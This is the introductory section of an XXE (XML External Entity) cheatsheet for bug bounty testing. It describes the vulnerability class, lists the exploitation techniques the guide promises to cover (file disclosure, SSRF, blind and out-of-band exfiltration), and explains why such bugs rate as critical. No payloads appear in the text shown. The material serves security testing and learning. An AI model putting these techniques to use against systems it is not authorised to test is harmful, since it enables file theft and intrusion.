XXE (XML External Entity) Cheatsheet
Vulnerability Summary
This cheatsheet provides a quick reference for exploiting and testing XML External Entity (XXE) vulnerabilities. It includes common payloads, techniques for file disclosure, SSRF, blind XXE exploitation, out-of-band exfiltration, and typical XML structures used during testing. It is intended as a practical guide to quickly identify and exploit XXE in different scenarios and parser configurations.
Understanding XXE (XML External Entity)
XXE (XML External Entity) vulnerabilities arise when an application processes XML data and permits the definition of external entities. This can be exploited by attackers to read local files, perform internal requests (Server-Side Request Forgery - SSRF), or, in rare cases, execute arbitrary code.
Why is XXE a High-Value Target in Bug Bounty Programs?
XXE vulnerabilities often evade detection by basic automated scans. Given their potential to compromise server infrastructure, they are typically classified as P1 (Critical) or P2 (High) on platforms such as HackerOne.